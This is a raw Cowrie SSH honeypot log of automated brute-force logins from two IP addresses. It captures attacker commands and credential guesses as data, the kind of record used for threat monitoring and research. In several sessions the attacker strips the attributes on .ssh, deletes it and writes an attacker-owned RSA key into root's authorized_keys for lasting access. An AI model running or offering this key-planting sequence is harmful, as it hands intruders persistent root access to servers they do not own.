{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:04:17.047709Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
{"eventid":"cowrie.login.success","username":"root","password":"Hetzner2022","message":"login attempt [root/Hetzner2022] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:04:17.951351Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:04:18.397680Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:04:18.398430Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:04:18.399626Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:04:18.616328Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:04:19.112885Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:04:19.113850Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:04:19.332393Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:04:19.333333Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41180,"dst_ip":"1.2.3.4","dst_port":22,"session":"2419714599eb","protocol":"ssh","message":"New connection: 212.227.235.229:41180 (1.2.3.4:22) [session: 2419714599eb]","sensor":"my-vps","timestamp":"2025-08-28T16:04:19.527911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:04:19.528690Z","src_ip":"212.227.235.229","session":"2419714599eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:04:19.734870Z","src_ip":"212.227.235.229","session":"2419714599eb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:04:20.596427Z","src_ip":"212.227.235.229","session":"2419714599eb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:04:21.804909Z","src_ip":"212.227.235.229","session":"2419714599eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41188,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3b9f31f01ff","protocol":"ssh","message":"New connection: 212.227.235.229:41188 (1.2.3.4:22) [session: b3b9f31f01ff]","sensor":"my-vps","timestamp":"2025-08-28T16:04:22.020854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:04:22.021568Z","src_ip":"212.227.235.229","session":"b3b9f31f01ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:04:22.238134Z","src_ip":"212.227.235.229","session":"b3b9f31f01ff"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:04:23.143538Z","src_ip":"212.227.235.229","session":"b3b9f31f01ff"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:04:23.361483Z","src_ip":"212.227.235.229","session":"b3b9f31f01ff"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:04:23.369840Z","src_ip":"212.227.235.229","session":"ebefefc33457"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35774,"dst_ip":"1.2.3.4","dst_port":22,"session":"af40d64badbc","protocol":"ssh","message":"New connection: 212.227.235.229:35774 (1.2.3.4:22) [session: af40d64badbc]","sensor":"my-vps","timestamp":"2025-08-28T16:04:42.567249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:04:42.568326Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:04:42.883483Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu1234","message":"login attempt [root/ubuntu1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:04:44.196607Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:04:45.248730Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:04:45.249618Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:04:45.250875Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:04:45.567646Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:04:46.216425Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:04:46.217143Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:04:46.533732Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:04:46.534633Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35776,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b8b38257481","protocol":"ssh","message":"New connection: 212.227.235.229:35776 (1.2.3.4:22) [session: 2b8b38257481]","sensor":"my-vps","timestamp":"2025-08-28T16:04:46.841005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:04:46.841913Z","src_ip":"212.227.235.229","session":"2b8b38257481"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:04:47.147896Z","src_ip":"212.227.235.229","session":"2b8b38257481"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:04:48.418900Z","src_ip":"212.227.235.229","session":"2b8b38257481"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:04:49.727237Z","src_ip":"212.227.235.229","session":"2b8b38257481"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49488,"dst_ip":"1.2.3.4","dst_port":22,"session":"e97c152cedd1","protocol":"ssh","message":"New connection: 212.227.235.229:49488 (1.2.3.4:22) [session: e97c152cedd1]","sensor":"my-vps","timestamp":"2025-08-28T16:04:50.031009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:04:50.031900Z","src_ip":"212.227.235.229","session":"e97c152cedd1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:04:50.336729Z","src_ip":"212.227.235.229","session":"e97c152cedd1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:04:51.597776Z","src_ip":"212.227.235.229","session":"e97c152cedd1"}
{"eventid":"cowrie.session.closed","duration":"9.3","message":"Connection lost after 9.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:04:51.904600Z","src_ip":"212.227.235.229","session":"af40d64badbc"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:04:51.905771Z","src_ip":"212.227.235.229","session":"e97c152cedd1"}
{"eventid":"cowrie.session.connect","src_ip":"161.35.112.121","src_port":35630,"dst_ip":"1.2.3.4","dst_port":22,"session":"451429f04fb5","protocol":"ssh","message":"New connection: 161.35.112.121:35630 (1.2.3.4:22) [session: 451429f04fb5]","sensor":"my-vps","timestamp":"2025-08-28T16:04:54.041587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:04:54.042258Z","src_ip":"161.35.112.121","session":"451429f04fb5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T16:04:54.133037Z","src_ip":"161.35.112.121","session":"451429f04fb5"}
{"eventid":"cowrie.login.success","username":"root","password":"Asd123321","message":"login attempt [root/Asd123321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:05:01.731455Z","src_ip":"212.227.235.229","session":"4479b928c0bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:05:01.763166Z","src_ip":"212.227.235.229","session":"4479b928c0bf"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:05:02.139680Z","src_ip":"161.35.112.121","session":"451429f04fb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55318,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffff8607d02a","protocol":"ssh","message":"New connection: 212.227.235.229:55318 (1.2.3.4:22) [session: ffff8607d02a]","sensor":"my-vps","timestamp":"2025-08-28T16:05:09.681227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:05:09.682115Z","src_ip":"212.227.235.229","session":"ffff8607d02a"}
